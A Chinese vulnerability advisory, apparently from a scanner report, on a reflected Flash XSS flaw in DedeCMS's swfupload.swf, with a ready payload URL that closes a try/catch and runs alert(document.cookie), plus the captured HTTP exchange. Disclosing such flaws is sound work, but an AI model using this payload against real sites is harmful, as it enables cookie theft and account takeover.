织梦DEDECMS Flash XSS漏洞

漏洞类型
DEDECMS Flash XSS漏洞

漏洞危害
XSS可导致黑客盗取用户登陆后的验证信息,从而使得黑客可以伪装为用户进行登陆。

漏洞说明
从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的”],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。

漏洞详情
Detail:***/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
response:{“header”:”HTTP/1.1 200 OK
Date: Sun, 27 May 2018 09:35:43 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 12787
Connection: keep-alive
Last-Modified: Fri, 01 Jul 2011 08:14:24 GMT
ETag: \”0b018e3c637cc1:0\”
X-Powered-By: ASP.NET
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Sun, 27 May 2018 13:35:43 GMT
Cache-Control: public, max-age=14400
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri=\”https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\”
Server: yunjiasu-nginx
CF-RAY: 42177e383dd64394-SZV
“}
request:{“body”:””,”header”:”GET /images/swfupload/swfupload.swf HTTP/1.1
Cookie: __cfduid=d28ed3db086fbe83a2dd36ca20d26d3c01527413742
Host: ***
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
“}
target:”***/images/swfupload/swfupload.swf”
url:***/images/swfupload/swfupload.swf

修复建议

[reply]

删除该文件:wwwroot\images\swfupload\swfupload.swf

[/reply]

人已赞赏
雕营销

五金器械电商解决方案

2018-3-3 0:03:19

黑客安全

为什么要禁用SSL2.0、SSL3.0和关闭TLS 1.0?

2019-5-14 13:21:43

免责声明本文中提到的资源均来自于互联网,仅供个人学习交流,若您喜欢本文可附上原文链接随意转载。
版权人申诉:我要申诉
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索